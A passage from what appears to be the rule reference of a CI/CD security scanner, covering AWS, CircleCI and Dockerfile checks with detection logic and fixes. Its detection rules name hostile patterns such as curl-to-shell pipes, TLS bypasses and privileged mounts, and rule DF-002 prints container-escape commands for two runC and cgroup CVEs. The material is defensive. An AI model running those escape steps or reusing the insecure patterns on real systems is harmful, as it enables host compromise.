How this is detected. OAUTH / PERSONAL_ACCESS_TOKEN / BASIC_AUTH source credentials are stored long-lived on the account and used by every CodeBuild project that points at the SCM provider. Rotating the upstream PAT requires manual re-credentialing here too. CodeConnections (CodeStar) is the AWS-managed alternative with token refresh and revocation.
Recommendation. Switch to an AWS CodeConnections (CodeStar) connection and reference it from the source configuration. Delete any stored source credentials of type OAUTH, PERSONAL_ACCESS_TOKEN, or BASIC_AUTH via delete_source_credentials.
Source: CB-006 in the AWS provider.
CB-007: CodeBuild webhook has no filter group MEDIUM
Evidences: 2.3.8 Ensure pipeline configuration files are reviewed before execution.
How this is detected. A CodeBuild webhook with no filter groups fires on every push and every PR from any actor, including fork PRs from outside the org. Anyone able to open a PR triggers the build with whatever IAM authority the project's role carries. Filter groups (branch + actor + event type) are the gate.
Recommendation. Define filter groups restricting triggers to specific branches, actors, and event types.
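In CloudFormation terms, a filter group restricting the webhook to pushes on a protected branch could be sketched as follows (patterns are placeholders):

```yaml
Triggers:
  Webhook: true
  FilterGroups:
    - - Type: EVENT
        Pattern: PUSH                # only push events, not fork PRs
      - Type: HEAD_REF
        Pattern: ^refs/heads/main$   # only the protected branch
```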
Source: CB-007 in the AWS provider.
CC-001: Orb not pinned to exact semver HIGH 🔧 fix
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.5 Ensure only trusted package managers and repositories are used.
How this is detected. Orb references in the orbs: block must include an @x.y.z suffix to lock a specific version. References without @, with @volatile, or with only a major (@1) or major.minor (@5.1) version float and can silently pull in malicious updates.
Recommendation. Pin every orb to an exact semver version (circleci/node@5.1.0). Floating references like @volatile, @1, or bare names without @ resolve to whatever is latest at build time, allowing a compromised orb update to execute in the pipeline.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
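A pinned orbs: block, for illustration (versions are examples, not current releases):

```yaml
orbs:
  node: circleci/node@5.1.0   # exact semver; published orb versions are immutable
  # floating forms the check flags:
  #   circleci/node            (no @ at all)
  #   circleci/node@volatile   (always latest)
  #   circleci/node@5          (floats within the major)
```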
Source: CC-001 in the CircleCI provider.
CC-002: Script injection via untrusted environment variable HIGH
Evidences: 2.1.3 Ensure the build environment is hardened.
How this is detected. CircleCI exposes environment variables like $CIRCLE_BRANCH, $CIRCLE_TAG, and $CIRCLE_PR_NUMBER that are controlled by the event source (branch name, tag, PR). Interpolating them unquoted into run: commands allows shell injection via specially crafted branch or tag names.
Recommendation. Do not interpolate attacker-controllable environment variables (CIRCLE_BRANCH, CIRCLE_TAG, CIRCLE_PR_NUMBER, etc.) directly into shell commands. Pass them through an intermediate variable and quote them, or use CircleCI pipeline parameters instead.
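A sketch of the safe shape, assuming a run step that needs the branch name:

```yaml
jobs:
  build:
    docker:
      - image: cimg/base:2024.01   # placeholder image
    steps:
      - run:
          name: use branch name safely
          # the shell expands the quoted variable from the environment;
          # metacharacters in a hostile branch name stay inert data
          command: echo "building branch: ${CIRCLE_BRANCH}"
```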
Source: CC-002 in the CircleCI provider.
CC-003: Docker image not pinned by digest HIGH
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.5 Ensure only trusted package managers and repositories are used.
How this is detected. Docker images referenced in docker: blocks under jobs or executors must include an @sha256:... digest suffix. Tag-only references (:latest, :18) are mutable and can be replaced at any time by whoever controls the upstream registry.
Recommendation. Pin every Docker image to its sha256 digest: cimg/node:18@sha256:abc123.... Tags like :latest or :18 are mutable: a registry compromise or upstream push silently replaces the image content.
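The pinned form, sketched with a placeholder digest (resolve the real one with docker buildx imagetools inspect cimg/node:18):

```yaml
jobs:
  build:
    docker:
      # the tag is kept for readability; the @sha256 digest is what is
      # actually verified at pull time (digest below is a placeholder)
      - image: cimg/node:18@sha256:0000000000000000000000000000000000000000000000000000000000000000
```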
Source: CC-003 in the CircleCI provider.
CC-004: Secret-like environment variable not managed via context MEDIUM
Evidences: 2.3.4 Ensure pipelines are scanned for secrets and sensitive data, 2.4.3 Ensure access to the pipeline execution environment is restricted.
How this is detected. Jobs that declare environment variables with secret-looking names (containing PASSWORD, TOKEN, SECRET, or API_KEY) in inline environment: blocks bypass CircleCI's context restrictions; security groups, OIDC claims, and audit logs are only enforced when secrets live in contexts.
Recommendation. Move secret-like variables (PASSWORD, TOKEN, SECRET, API_KEY) into a CircleCI context and reference the context in the workflow job configuration. Contexts support security groups and audit logging that inline environment: blocks lack.
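A sketch of the context-based shape (the context name prod-secrets is a placeholder; the values themselves live in org settings, not in this file):

```yaml
workflows:
  deploy:
    jobs:
      - deploy-job:
          context: prod-secrets   # job receives the context's env vars at runtime
```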
Source: CC-004 in the CircleCI provider.
CC-005: AWS auth uses long-lived access keys in environment block MEDIUM 🔧 fix
Evidences: 1.3.4 Ensure organization identity is required for contribution (no long-lived personal tokens).
How this is detected. Long-lived AWS access keys declared directly in a job's environment: block are visible to anyone who can read the config. They cannot be rotated automatically and remain valid until manually revoked. OIDC-based federation yields short-lived credentials per build.
Recommendation. Remove AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY from the job environment: block. Use CircleCI's OIDC token with aws-cli/setup orb's role-based auth, or store credentials in a context with security group restrictions.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
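An OIDC-based sketch using the aws-cli orb (orb version, role ARN, and region are placeholders; check parameter names against the orb version you actually use):

```yaml
orbs:
  aws-cli: circleci/aws-cli@4.1.0
jobs:
  deploy:
    executor: aws-cli/default
    steps:
      # exchanges CircleCI's OIDC token for short-lived STS credentials;
      # nothing long-lived is stored in the config or a context
      - aws-cli/setup:
          role_arn: arn:aws:iam::123456789012:role/circleci-deploy
          region: us-east-1
```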
Source: CC-005 in the CircleCI provider.
CC-006: Artifacts not signed (no cosign/sigstore step) MEDIUM
Evidences: 4.1.1 Ensure all artifacts on all releases are verified (signed, integrity-checked).
How this is detected. Unsigned artifacts cannot be verified downstream, so a tampered build is indistinguishable from a legitimate one. The check recognises cosign, sigstore, slsa-framework, and notation-sign as signing tools.
Recommendation. Add a signing step to the pipeline, e.g. install cosign and run cosign sign, or use the sigstore CLI. Publish the signature alongside the artifact and verify it at consumption time.
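One possible signing step, sketched with cosign's blob-signing mode (artifact and signature names are placeholders; this assumes cosign is already installed through a trusted channel):

```yaml
steps:
  - run:
      name: sign release artifact
      # sign-blob emits a detached signature to publish next to the
      # artifact; consumers check it with cosign verify-blob
      command: cosign sign-blob --yes --output-signature app.tar.gz.sig app.tar.gz
```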
Source: CC-006 in the CircleCI provider.
CC-007: SBOM not produced (no CycloneDX/syft/Trivy-SBOM step) MEDIUM
Evidences: 4.4.1 Ensure artifacts have provenance/SBOM metadata.
How this is detected. Without an SBOM, downstream consumers cannot audit the exact set of dependencies shipped in the artifact, delaying vulnerability response when a transitive dep is disclosed. The check recognises CycloneDX, syft, Anchore SBOM action, spdx-sbom-generator, Microsoft sbom-tool, and Trivy in SBOM mode.
Recommendation. Add an SBOM generation step: syft . -o cyclonedx-json, Trivy with --format cyclonedx, or Microsoft's sbom-tool. Attach the SBOM to the build artifacts so consumers can ingest it into their vulnerability management pipeline.
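A minimal syft-based sketch (the output filename is a placeholder; assumes syft is on PATH):

```yaml
steps:
  - run:
      name: generate SBOM
      command: syft . -o cyclonedx-json=sbom.cdx.json
  - store_artifacts:
      path: sbom.cdx.json   # keeps the SBOM with the build for consumers
```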
Source: CC-007 in the CircleCI provider.
CC-008: Credential-shaped literal in config body CRITICAL 🔧 fix
Evidences: 2.3.4 Ensure pipelines are scanned for secrets and sensitive data, 2.4.3 Ensure access to the pipeline execution environment is restricted.
How this is detected. Every string in the config is scanned against a set of credential patterns (AWS access keys, GitHub tokens, Slack tokens, JWTs, Stripe, Google, Anthropic, etc.). A match means a secret was pasted into YAML: the value is visible in every fork and every build log and must be treated as compromised.
Recommendation. Rotate the exposed credential immediately. Move the value to a CircleCI project environment variable or a context and reference it via the variable name. For cloud access, prefer OIDC federation over long-lived keys.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Test fixtures and documentation blobs sometimes embed credential-shaped strings (JWT samples, AKIAI... examples). The AWS canonical example AKIAIOSFODNN7EXAMPLE is deliberately NOT suppressed; if it appears in a real pipeline it almost always means a copy-paste from docs was never substituted. Defaults to LOW confidence.
Source: CC-008 in the CircleCI provider.
CC-009: Deploy job missing manual approval gate MEDIUM
Evidences: 2.3.8 Ensure pipeline configuration files are reviewed before execution, 5.1.4 Ensure deployment configuration manifests are reviewed before apply.
How this is detected. In CircleCI, manual approval is implemented by adding a job with type: approval to the workflow and making the deploy job require it. Without this gate, any push to the triggering branch deploys immediately with no human review.
Recommendation. Add a type: approval job that precedes the deploy job in the workflow, and list it in the deploy job's requires:. This ensures a human must click Approve in the CircleCI UI before production changes roll out.
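The workflow shape, with placeholder job names:

```yaml
workflows:
  release:
    jobs:
      - build
      - hold-for-prod:
          type: approval              # workflow pauses here until a human approves
          requires: [build]
      - deploy:
          requires: [hold-for-prod]   # deploy cannot start without the approval
```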
Source: CC-009 in the CircleCI provider.
CC-010: Self-hosted runner without ephemeral marker MEDIUM
Evidences: 2.1.3 Ensure the build environment is hardened, 2.1.6 Ensure build workers have minimal network connectivity.
How this is detected. Self-hosted runners that persist between jobs leak filesystem and process state. A PR-triggered job writes to /tmp; a subsequent prod-deploy job on the same runner reads it. The check looks for resource_class values containing 'self-hosted'; if found, it checks for 'ephemeral' in the value. It also checks for machine: true combined with a self-hosted resource class.
Recommendation. Configure self-hosted runners to tear down between jobs. Use a resource_class value that includes an ephemeral marker, or use CircleCI's machine executor with runner auto-scaling so each job gets a fresh environment.
Source: CC-010 in the CircleCI provider.
CC-011: No store_test_results step (test results not archived) LOW
Evidences: 2.3.7 Ensure pipeline steps produce audit logs.
How this is detected. Without store_test_results, test output is only available in the raw build log. Archiving test results enables CircleCI's test insights, timing-based splitting, and provides an audit trail that links each build to its test outcomes.
Recommendation. Add a store_test_results step to jobs that run tests. This archives test results in CircleCI for traceability, trend analysis, and debugging flaky tests.
Source: CC-011 in the CircleCI provider.
CC-012: Dynamic config via setup: true enables code injection MEDIUM
Evidences: 2.1.3 Ensure the build environment is hardened.
How this is detected. When setup: true is set at the top level, the config becomes a setup workflow. It generates the real pipeline config dynamically (typically via the circleci/continuation orb). An attacker who controls the setup job (e.g. via a malicious PR in a fork) can inject arbitrary config for all subsequent jobs, including deploy steps with production secrets.
Recommendation. If setup: true is required, restrict the setup job to a trusted branch filter and audit the generated config carefully. Ensure the continuation orb's configuration_path points to a checked-in file, not a dynamically generated one that could be influenced by PR content.
Source: CC-012 in the CircleCI provider.
CC-013: Deploy job in workflow has no branch filter MEDIUM
Evidences: 2.3.8 Ensure pipeline configuration files are reviewed before execution.
How this is detected. Without branch filters, a deploy job triggers on every branch push, including feature branches and forks. Restricting sensitive jobs to specific branches limits the blast radius of a compromised commit.
Recommendation. Add filters.branches.only to deploy-like workflow jobs so they only run on protected branches (e.g. main, release/*).
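A sketch with placeholder branch patterns:

```yaml
workflows:
  deploy:
    jobs:
      - deploy-prod:
          filters:
            branches:
              only:
                - main
                - /release\/.*/   # regex filters are wrapped in slashes
```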
Source: CC-013 in the CircleCI provider.
CC-014: Job missing resource_class declaration MEDIUM
Evidences: 2.1.6 Ensure build workers have minimal network connectivity.
How this is detected. Without an explicit resource_class, CircleCI assigns a default executor. Declaring the class documents the expected scope and prevents accidental use of larger (or self-hosted) executors that may have elevated privileges.
Recommendation. Add resource_class: to every job to explicitly control the executor size and capabilities. Use the smallest class that satisfies build requirements.
Source: CC-014 in the CircleCI provider.
CC-015: No no_output_timeout configured MEDIUM 🔧 fix
Evidences: 2.2.2 Ensure build workers are single-use.
How this is detected. Without no_output_timeout, a hung step can consume executor time indefinitely. Explicit timeouts cap cost and the window during which a compromised step has access to secrets and the build environment.
Recommendation. Add no_output_timeout: to long-running run steps, or set it at the job level. A reasonable value is 10-30 minutes; CircleCI applies a 10-minute default where none is set, which may not match every pipeline, and an explicit value documents the expected duration.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
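A sketch with an illustrative value:

```yaml
steps:
  - run:
      name: integration tests
      no_output_timeout: 20m      # kill the step after 20 minutes of silence
      command: make integration-test
```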
Source: CC-015 in the CircleCI provider.
CC-016: Remote script piped to shell interpreter HIGH 🔧 fix
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.5 Ensure only trusted package managers and repositories are used.
How this is detected. Detects curl | bash, wget | sh, and similar patterns that pipe remote content directly into a shell interpreter inside a CircleCI config. An attacker who controls the remote endpoint (or poisons DNS / CDN) gains arbitrary code execution in the CI runner.
Recommendation. Download the script to a file, verify its checksum, then execute it. Or vendor the script into the repository.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Established vendor installers (get.docker.com, sh.rustup.rs, bun.sh/install, awscli.amazonaws.com, cli.github.com, ...) ship via HTTPS from their own CDN and are idiomatic. This rule defaults to LOW confidence so CI gates can ignore them with --min-confidence MEDIUM; the finding still surfaces so teams that want cryptographic verification can audit.
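The download-verify-execute pattern from the recommendation, sketched as a run step (URL and checksum are placeholders for the real values):

```yaml
steps:
  - run:
      name: install tool with checksum verification
      command: |
        curl -fsSLo installer.sh https://example.com/installer.sh
        # fails the step if the downloaded bytes differ from the pinned hash
        echo "<expected-sha256>  installer.sh" | sha256sum -c -
        sh installer.sh
```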
Source: CC-016 in the CircleCI provider.
CC-017: Docker run with insecure flags (privileged/host mount) CRITICAL 🔧 fix
Evidences: 2.1.3 Ensure the build environment is hardened.
How this is detected. Flags like --privileged, --cap-add, --net=host, or host-root volume mounts (-v /:/) in a CircleCI config give the container full access to the runner, enabling container escape and lateral movement.
Recommendation. Remove --privileged and --cap-add flags. Use minimal volume mounts. Prefer rootless containers.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: CC-017 in the CircleCI provider.
CC-018: Package install from insecure source HIGH 🔧 fix
Evidences: 3.1.5 Ensure only trusted package managers and repositories are used.
How this is detected. Detects package-manager invocations that use plain HTTP registries (--index-url http://, --registry=http://) or disable TLS verification (--trusted-host, --no-verify) in a CircleCI config. These patterns allow man-in-the-middle injection of malicious packages.
Recommendation. Use HTTPS registry URLs. Remove --trusted-host and --no-verify flags. Pin to a private registry with TLS.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: CC-018 in the CircleCI provider.
CC-019: add_ssh_keys without fingerprint restriction HIGH
Evidences: 1.3.4 Ensure organization identity is required for contribution (no long-lived personal tokens).
How this is detected. A bare - add_ssh_keys step (without fingerprints:) loads every SSH key configured on the project into the job. This violates least privilege: the job gains access to keys it does not need, increasing the blast radius if the job is compromised.
Recommendation. Always specify fingerprints: when using add_ssh_keys to restrict which SSH keys are loaded into the job. A bare add_ssh_keys step loads ALL project SSH keys.
Source: CC-019 in the CircleCI provider.
CC-020: No vulnerability scanning step MEDIUM
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.3 Ensure signed metadata of dependencies is verified.
How this is detected. Without a vulnerability scanning step, known-vulnerable dependencies ship to production undetected. The check recognises trivy, grype, snyk, npm audit, yarn audit, safety check, pip-audit, osv-scanner, and govulncheck.
Recommendation. Add a vulnerability scanning step: trivy, grype, snyk test, npm audit, pip-audit, or osv-scanner. Publish results so vulnerabilities surface before deployment.
Source: CC-020 in the CircleCI provider.
CC-021: Package install without lockfile enforcement MEDIUM 🔧 fix
Evidences: 3.1.3 Ensure signed metadata of dependencies is verified.
How this is detected. Detects package-manager install commands that do not enforce a lockfile or hash verification. Without lockfile enforcement the resolver pulls whatever version is currently latest, exactly the window a supply-chain attacker exploits.
Recommendation. Use lockfile-enforcing install commands: npm ci instead of npm install, pip install --require-hashes -r requirements.txt, yarn install --frozen-lockfile, bundle install --frozen, and go install tool@v1.2.3.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
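Lockfile-enforcing equivalents per ecosystem, sketched as run steps:

```yaml
steps:
  - run: npm ci                                            # fails if package-lock.json is missing or stale
  - run: pip install --require-hashes -r requirements.txt  # every dep needs a pinned hash
  - run: yarn install --frozen-lockfile                    # refuses to rewrite yarn.lock
```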
Source: CC-021 in the CircleCI provider.
CC-022: Dependency update command bypasses lockfile pins MEDIUM 🔧 fix
Evidences: 3.1.3 Ensure signed metadata of dependencies is verified.
How this is detected. Detects pip install --upgrade, npm update, yarn upgrade, bundle update, cargo update, go get -u, and composer update. These commands bypass lockfile pins and pull whatever version is currently latest. Tooling upgrades (pip install --upgrade pip) are exempted.
Recommendation. Remove dependency-update commands from CI. Use lockfile-pinned install commands (npm ci, pip install -r requirements.txt) and update dependencies via a dedicated PR workflow (e.g. Dependabot, Renovate).
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Known false positives.
- Common build-tool bootstrapping idioms (pip install --upgrade pip, pip install --upgrade setuptools wheel virtualenv) and security-tool installs (pip install --upgrade pip-audit / cyclonedx-bom / semgrep) are exempted by the DEP_UPDATE_RE tooling allowlist. Other tooling-upgrade idioms not yet on the list can still trip the rule. Defaults to MEDIUM confidence so CI gates can require --min-confidence HIGH to ignore.
Source: CC-022 in the CircleCI provider.
CC-023: TLS / certificate verification bypass HIGH 🔧 fix
Evidences: 3.1.5 Ensure only trusted package managers and repositories are used.
How this is detected. Detects patterns that disable TLS certificate verification: git config http.sslVerify false, NODE_TLS_REJECT_UNAUTHORIZED=0, npm config set strict-ssl false, curl -k, wget --no-check-certificate, PYTHONHTTPSVERIFY=0, and GOINSECURE=. Disabling TLS verification allows MITM injection of malicious packages, repositories, or build tools.
Recommendation. Remove TLS verification bypasses. Fix certificate issues at the source (install CA certificates, configure proper trust stores) instead of disabling verification.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: CC-023 in the CircleCI provider.
CD-001: Automatic rollback on failure not enabled MEDIUM
Evidences: 5.1.4 Ensure deployment configuration manifests are reviewed before apply.
How this is detected. Without autoRollbackConfiguration, a CodeDeploy deployment that fails leaves the failed revision live until an operator notices. The default is opt-in, not opt-out: deployments fail open, not fail back.
Recommendation. Enable autoRollbackConfiguration with at least the DEPLOYMENT_FAILURE event so CodeDeploy automatically reverts to the last successful revision when a deployment fails.
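In CloudFormation terms, on the AWS::CodeDeploy::DeploymentGroup resource (a sketch; include the alarm event only if the group's alarms are actually wired up):

```yaml
AutoRollbackConfiguration:
  Enabled: true
  Events:
    - DEPLOYMENT_FAILURE          # revert when the deployment itself fails
    - DEPLOYMENT_STOP_ON_ALARM    # revert when a monitored CloudWatch alarm trips
```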
Source: CD-001 in the AWS provider.
CD-002: AllAtOnce deployment config, no canary or rolling strategy HIGH
Evidences: 5.1.4 Ensure deployment configuration manifests are reviewed before apply, 5.2.1 Ensure deployment environments are separated.
How this is detected. AllAtOnce shifts 100% of traffic to the new revision in one step. There's no gradient to halt on; if a CloudWatch alarm trips mid-rollout, the bad revision is already serving every request. Canary / linear configs introduce the shift-then-watch shape that lets monitors catch a regression before it's universal.
Recommendation. Switch to a canary or linear deployment configuration (e.g. CodeDeployDefault.LambdaCanary10Percent5Minutes or a custom rolling config) so that defects are caught before they affect all instances or traffic.
Source: CD-002 in the AWS provider.
CD-003: No CloudWatch alarm monitoring on deployment group MEDIUM
Evidences: 5.2.3 Ensure deployment environment activity is audited.
How this is detected. Alarm-based rollback is what lets a canary configuration actually stop a bad deploy mid-flight. Without alarms wired into alarmConfiguration, CodeDeploy's only signal that the deploy went wrong is the deployment-state machine itself, which doesn't notice an application-level regression. CD-002's canary work and this rule's alarm-based halt are paired.
Recommendation. Add CloudWatch alarms (e.g. error rate, 5xx count, latency p99) to the deployment group's alarmConfiguration. Enable automatic rollback on DEPLOYMENT_STOP_ON_ALARM to halt bad deployments.
Source: CD-003 in the AWS provider.
CP-001: No approval action before deploy stages HIGH
Evidences: 2.3.8 Ensure pipeline configuration files are reviewed before execution, 5.1.4 Ensure deployment configuration manifests are reviewed before apply.
How this is detected. A pipeline that goes Source -> Build -> Deploy with no Approval action means every commit on the source branch ships, with no human ack between code-merged and code-running-in-prod. The Manual approval action is the intentional pause point; combine with CP-005 for production-tagged stages specifically.
Recommendation. Add a Manual approval action to a stage that precedes every Deploy stage that targets a production or sensitive environment.
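A CloudFormation sketch of the stage shape (stage and action names are placeholders):

```yaml
- Name: ApproveRelease            # insert before the production Deploy stage
  Actions:
    - Name: ManualApproval
      ActionTypeId:
        Category: Approval
        Owner: AWS
        Provider: Manual
        Version: "1"
      RunOrder: 1
```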
Source: CP-001 in the AWS provider.
CP-002: Artifact store not encrypted with customer-managed KMS key MEDIUM
Evidences: 2.4.2 Ensure pipeline integrity, artifacts are signed by the pipeline, 4.1.1 Ensure all artifacts on all releases are verified (signed, integrity-checked).
How this is detected. The pipeline's S3 artifact store holds intermediate build outputs handed between stages. Default SSE-S3 (AES256) encrypts at rest but uses an AWS-owned key whose policy you can't scope. A customer-managed CMK gives the same key-policy + CloudTrail Decrypt-event audit story you'd apply to Lambda code, Secrets Manager, or any other build output.
Recommendation. Configure a customer-managed AWS KMS key as the encryptionKey for each artifact store. This enables key rotation, fine-grained access policies, and CloudTrail auditing of decrypt operations.
Source: CP-002 in the AWS provider.
CP-003: Source stage using polling instead of event-driven trigger LOW
Evidences: 2.3.8 Ensure pipeline configuration files are reviewed before execution.
How this is detected. PollForSourceChanges=true polls the source repo every minute or two. Beyond the API-quota and latency cost, polling produces a less-useful CloudTrail story than event-driven triggers. You see the poll calls, not the specific commit that started the pipeline. EventBridge / CodeCommit triggers tie each pipeline start to the originating event.
Recommendation. Set PollForSourceChanges=false and configure an Amazon EventBridge rule or CodeCommit trigger to start the pipeline on change. This reduces latency, API usage, and improves auditability.
Known false positives.
- PollForSourceChanges=true is the CFN default for CodeCommit sources, so legacy templates can carry the flag without an active design decision behind it. The rule is advisory (consider EventBridge / CodeStarSourceConnection) rather than a real risk; defaults to LOW confidence so CI gates default-filter it.
Source: CP-003 in the AWS provider.
CP-004: Legacy ThirdParty/GitHub source action (OAuth token) HIGH
Evidences: 1.3.4 Ensure organization identity is required for contribution (no long-lived personal tokens).
How this is detected. The legacy ThirdParty/GitHub source-action provider stores a long-lived OAuth token in the pipeline's action configuration. The token has whatever scope the granting GitHub user has, never rotates, and isn't directly revocable from the AWS side. CodeConnections (formerly CodeStar Connections) replaces this with an AWS-managed connection that the GitHub user can revoke.
Recommendation. Migrate to owner=AWS, provider=CodeStarSourceConnection and reference a CodeConnections connection ARN.
Source: CP-004 in the AWS provider.
DF-001: FROM image not pinned to sha256 digest HIGH 🔧 fix
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.3 Ensure signed metadata of dependencies is verified.
How this is detected. Reuses _primitives/image_pinning.classify so the floating-tag semantics match GL-001 / JF-009 / ADO-009 / CC-003. PINNED_TAG (e.g. python:3.12.1-slim) is treated as unpinned here too, only an explicit @sha256: survives, since the tag is mutable on the registry side.
Recommendation. Resolve every base image to its current digest (docker buildx imagetools inspect <ref> prints it) and pin via FROM repo@sha256:<digest>. Automate refreshes with Renovate or Dependabot. A floating tag (:latest, :3, no tag) silently swaps the build base under every rebuild.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Seen in the wild.
- Docker Hub typosquatting / namespace-takeover incidents (2017 onward): Sysdig and Aqua research documented thousands of malicious images uploaded under near-miss names (alpine vs alphine, etc.) and occasional namespace recoveries shipping crypto-miners downstream. Digest-pinned consumers are immune; tag-pinned consumers pull whatever sits under the name today.
- Codecov codecov/codecov-action tag-mutation incident (post-Codecov-Bash-uploader compromise): the upstream rotated the action's @v3 tag during the fallout, and consumers pinning to the tag silently re-ran a different build than before. Digest pinning would have surfaced the change as a checksum mismatch instead of a silent swap.
Source: DF-001 in the Dockerfile provider.
DF-002: Container runs as root (missing or root USER directive) HIGH 🔧 fix
Evidences: 2.1.3 Ensure the build environment is hardened.
How this is detected. Multi-stage builds: only the final stage matters for runtime identity, since intermediate stages don't ship. The check scopes USER to the last FROM through end-of-file.
Recommendation. Add a USER <non-root> directive after package install steps (e.g. USER 1001 or USER appuser). Running as root inside a container is not isolation: a kernel CVE, a misconfigured mount, or a mis-applied capability collapses straight into the host.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Seen in the wild.
- CVE-2019-5736 (runC host breakout): a malicious container running as root could overwrite the host's runC binary and compromise every other container on the node. Non-root containers were not exploitable.
- CVE-2022-0492 (cgroups v1 escape via release_agent): root inside a container with CAP_SYS_ADMIN could write to the host's release_agent file and execute arbitrary host code. Containers running as a non-root UID side-stepped the exploit class entirely.
Proof of exploit.
Vulnerable: image runs as root by default (no USER set).
FROM ubuntu:22.04
RUN apt-get update && apt-get install -y python3
COPY app.py /app/
CMD ["python3", "/app/app.py"]
Attack: when the container is breached (RCE in the app, a
kernel CVE, a misconfigured mount), the attacker runs as
UID 0. From there:
# CVE-2019-5736 path: overwrite /proc/self/exe to corrupt the
# host's runC binary and reach every container on the node;
# the next launch executes attacker code on the host:
printf '#!/bin/sh\n/attacker_payload' > /proc/self/exe
# CVE-2022-0492 path: cgroup release_agent escape:
mkdir /tmp/cg && mount -t cgroup -o memory cgroup /tmp/cg
echo '/payload' > /tmp/cg/release_agent
echo 1 > /tmp/cg/notify_on_release
A non-root UID makes both paths fail at the first syscall.
Safe: drop to a dedicated unprivileged user.
FROM ubuntu:22.04
RUN apt-get update && apt-get install -y python3 \
    && useradd --uid 1001 --create-home app
COPY --chown=app:app app.py /app/
USER 1001
CMD ["python3", "/app/app.py"]
Source: DF-002 in the Dockerfile provider.
DF-003: ADD pulls remote URL without integrity verification HIGH
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.3 Ensure signed metadata of dependencies is verified.
How this is detected. ADD with a URL is the historical Dockerfile footgun: it fetches at build time over HTTP(S) with no checksum and no signature, and the registry tag does not pin the source. A tampered server or DNS hijack silently swaps the content. COPY is for local files; RUN curl + verify is for remote ones.
Recommendation. Replace ADD https://... with a multi-step RUN: download the file with curl -fsSLo, verify a known-good checksum (sha256sum -c) or signature (cosign verify-blob), then extract / install. Better still: download the artifact in a builder stage and COPY it across. That way the verifier runs once at build time, not per-pull.
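A minimal sketch of the builder-stage pattern; the URL, digest placeholder, and stage name here are illustrative, not part of the rule:

```dockerfile
# Builder stage: fetch and verify the artifact once, at build time.
FROM alpine:3.19 AS fetcher
# <digest> stands in for the known-good SHA-256 of the release.
RUN apk add --no-cache curl \
 && curl -fsSLo /tmp/tool.tar.gz https://example.com/tool.tar.gz \
 && echo '<digest>  /tmp/tool.tar.gz' | sha256sum -c - \
 && tar -xzf /tmp/tool.tar.gz -C /usr/local/bin

# Runtime stage: only the verified artifact crosses over.
FROM alpine:3.19
COPY --from=fetcher /usr/local/bin/tool /usr/local/bin/tool
```

The build fails at the sha256sum step if the server content changes, instead of silently shipping the tampered file.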
Source: DF-003 in the Dockerfile provider.
DF-004: RUN executes a remote script via curl-pipe / wget-pipe HIGH
Evidences: 1.4.1 Ensure third-party artifacts and open-source libraries are verified, 3.1.5 Ensure only trusted package managers and repositories are used.
How this is detected. Reuses _primitives/remote_script_exec.scan so the vocabulary matches the equivalent CI-side rules (GHA-016, GL-016, BB-012, ADO-016, CC-016, JF-016).
Recommendation. Download to a file, verify checksum or signature, then execute. curl -fsSL <url> -o /tmp/x.sh && sha256sum -c <(echo '<digest> /tmp/x.sh') && bash /tmp/x.sh. Vendor installers from well-known hosts (rustup.rs, get.docker.com, ...) are reported with vendor_trusted=true so reviewers can calibrate.
Source: DF-004 in the Dockerfile provider.
DF-005: RUN uses shell-eval (eval / sh -c on a variable / backticks) HIGH
Evidences: 2.1.3 Ensure the build environment is hardened.
How this is detected. Reuses _primitives/shell_eval.scan, same primitive used by GHA-028 / GL-026 / BB-026 / ADO-027 / CC-027 / JF-030 so the safe / unsafe vocabulary matches across the tool.
Recommendation. Replace eval "$X" and sh -c "$X" with explicit argv invocations. If the build genuinely needs a templated command, render it through a sealed config file or use RUN --mount=type=secret with explicit input. $( … ) / backticks should never wrap interpolated user-controlled vars inside a Dockerfile.
Source: DF-005 in the Dockerfile provider.
DF-006: ENV or ARG carries a credential-shaped literal value CRITICAL
Evidences: 2.3.4 Ensure pipelines are scanned for secrets and sensitive data.
How this is detected. Reuses _primitives/secret_shapes, flags AKIA-prefixed AWS keys outright (the literal AWS access-key shape) and credential-named keys (API_KEY, DB_PASSWORD, SECRET_TOKEN) when the value is a non-empty literal.
